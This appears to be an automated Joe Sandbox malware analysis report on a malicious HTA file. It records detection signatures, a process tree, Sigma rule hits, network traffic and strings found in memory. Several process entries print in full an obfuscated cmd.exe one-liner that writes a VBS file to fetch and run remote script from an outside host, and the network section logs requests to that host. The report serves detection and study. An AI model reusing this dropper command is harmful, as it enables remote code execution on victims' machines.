Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Archivo-PxFkiLTWYG-23122024095010.hta

Overview

General Information

Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
Analysis ID:1579831
MD5:74903ec7a266a9d8d2c5d96d8b9b4965
SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Command shell drops VBS files
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w11x64_office
  • mshta.exe (PID: 3360 cmdline: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta" MD5: FE91714AF17067613A33BE57793819EE)
    • cmd.exe (PID: 7684 cmdline: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
      • cmd.exe (PID: 7768 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
      • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
        • cmd.exe (PID: 3864 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
        • cmd.exe (PID: 3440 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
          • cmd.exe (PID: 8152 cmdline: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: 7B2C2B671D3F48A01B334A0070DEC0BD)
            • wscript.exe (PID: 7300 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" MD5: 38001313D74BCC31CA3C7FC16B502F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7300, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 49840
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8152, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 7300, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3360, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ProcessId: 7684, ProcessName: cmd.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8152, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 7300, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7820, TargetFilename: C:\Users\Public\cNOV.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7300, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 49840
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8152, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 7300, ProcessName: wscript.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T10:41:25.563156+010020244491Attempted User Privilege Gain192.168.2.244983716.12.2.36443TCP

Click to jump to signature section

Show All Signature Results

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.24:49837 -> 16.12.2.36:443
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: mshta.exe, 00000001.00000003.12534849200.0000000009DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tps://www.facebook.com/americanascom equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}" equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}" equals www.twitter.com (Twitter)
Source: mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}" equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 